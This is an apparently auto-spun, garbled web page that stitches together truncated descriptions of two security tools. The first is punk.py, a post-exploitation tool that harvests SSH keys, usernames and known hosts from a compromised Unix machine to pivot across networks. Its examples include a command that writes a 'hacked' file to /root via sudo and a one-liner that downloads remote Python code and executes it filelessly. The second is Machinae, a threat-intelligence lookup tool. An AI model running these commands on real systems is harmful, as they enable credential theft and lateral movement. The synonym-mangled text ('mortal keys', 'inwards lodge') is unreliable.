sf

unix SSH post-exploitation 1337 tool how it works punk.py is a post-exploitation tool meant to assistance network pivoting from a compromised unix box. It collect usernames, ssh keys in addition to known hosts from a unix system, in addition to hence it tries to connect via ssh to all the combinations found. punk.py is wrote inwards lodge to function on criterion python2 in addition to python3 installations. examples criterion execution: $ ./punk.py skip passwd checks in addition to role a custom abode path: $ ./punk.py --no-passwd --home /home/ldapusers/ execute commands alongside sudo: $ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'" one-liner fileless ( alongside --no-passwd parameter ): $ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd TODO improve mortal keys hunting including dsa keys Recursion SSH keys alongsid...

Machinae is a tool for collecting tidings from world sites/feeds nearly diverse security-related pieces of data: IP addresses, domain names, URLs, electronic mail addresses, file hashes, together with SSL fingerprints. It was inspired past times Automater , about other first-class tool for collecting information. The Machinae projection was born from wishing to amend Automater inwards four areas: Codebase - Bring Automater to python3 compatibility piece making the code to a greater extent than pythonic Configuration - Use a to a greater extent than human readable configuration format (YAML) Inputs - Support JSON parsing out-of-the-box without the ask to write regular expressions, but even hence back upward regex scraping when needed Outputs - Support additional output types, including JSON, piece making extraneous output optional Installation Machinae tin live installed using pip3: pip3 install machinae Or, if you're feeling adventurous, tin live installed stra...